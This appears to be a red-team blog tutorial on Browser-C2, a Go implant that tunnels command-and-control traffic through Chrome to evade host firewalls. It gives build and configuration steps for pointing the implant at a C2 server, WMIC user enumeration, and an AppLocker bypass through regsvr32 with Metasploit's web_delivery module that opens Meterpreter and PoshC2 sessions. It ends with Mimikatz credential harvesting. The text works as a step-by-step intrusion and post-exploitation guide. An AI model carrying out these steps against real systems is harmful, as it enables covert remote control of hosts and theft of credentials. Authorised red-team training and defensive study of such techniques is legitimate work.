Red Teams are always focused in the discovery of innovative ways to establish connections back to their command and control infrastructure. The main reasons that leads red teams to use standard protocols or native system functionality for command and control operations is to bypass some sort of restrictions and to stay of the radar of the blue team.  0x09AL developed Browser-C2 in Go which uses the browser (Chrome) as a communication channel and can bypass host based firewalls. 0x09AL described the idea and the operation of the tool in his blog.

The tool requires the following two components in order to operate successfully.

go get -u github.com/gorilla/mux
go get -u github.com/chzyer/readline

The implant can be compiled to executable with the following command. However prior to that activity the agent.go file needs to be changed to contain the IP address of the C2 server.

go build agent.go
Browser C2 - Converting the implant to exe

Browser C2 – Converting the implant to executable

The jquery file needs to modified to contain the IP of the command and control server in the var url parameter.

Browser C2 - jquery Configuration

The main command and control application can be compiled with the following:

go build

When the implant will executed on the target host Chrome browser will initiate and automatically will reach the Command and Control server endpoint.

Browser C2 - Agent Execution

Browser C2 – Agent Execution

A connection will establish with the C2 server and commands can be executed to retrieve host information.

Browser C2 - Command Execution

Browser C2 – Command Execution

The Windows Management Instrumentation command line utility can be also used for additional host recon.

wmic useraccount list full
Browser C2 - User Enumeration via WMIC

Browser C2 – User Enumeration via WMIC

Browser-C2 doesn’t support encryption for communication between the server and the compromised host and has limited functionality since it cannot execute PowerShell scripts  and it can only used for basic command execution. For additional operations an alternative channel such as Meterpeter or PoshC2 can be considered. The Metasploit Framework module web delivery will generate and host a scriptlet automatically.

exploit/multi/script/web_delivery
Browser C2 - Metasploit Web Delivery Module

Browser C2 – Metasploit Web Delivery Module

The regsvr32 is a common method discovered by Casey Smith which bypasses AppLocker policies and it is a reliable technique to execute arbitrary code remotely. The scriptlet can be executed from an existing Browser-C2 agent session.

Browser C2 - Code Execution via regsvr32 Metasploit

Browser C2 – Code Execution via regsvr32 Metasploit

When the payload will delivered a Meterpreter session will open which will provide enhanced capabilities.

Browser C2 - Meterpreter via Web Delivery

Browser C2 – Meterpreter via Web Delivery

Usage of the same method can also establish a connection with PoshC2 for post-exploitation activities based in PowerShell.

Browser C2 - Code Execution via regsvr32 PoshC2

Browser C2 – Code Execution via regsvr32 for PoshC2

The implant handler of PoshC2 will receive the connection.

Browser C2 - Implant Handler

PoshC2 – Implant Handler

Interaction with the implant will start by selecting the associated ID. PoshC2 contains various PowerShell modules which can be used for extensive host recon credential grabbing like Mimikatz.

Browser C2 - Mimikatz via Implant Handler

Browser C2 – Mimikatz via Implant Handler

Mimikatz output will appear in the PoshC2 console.

Browser C2 - Mimikatz PoshC2

Browser C2 – Mimikatz PoshC2

References

Advertisements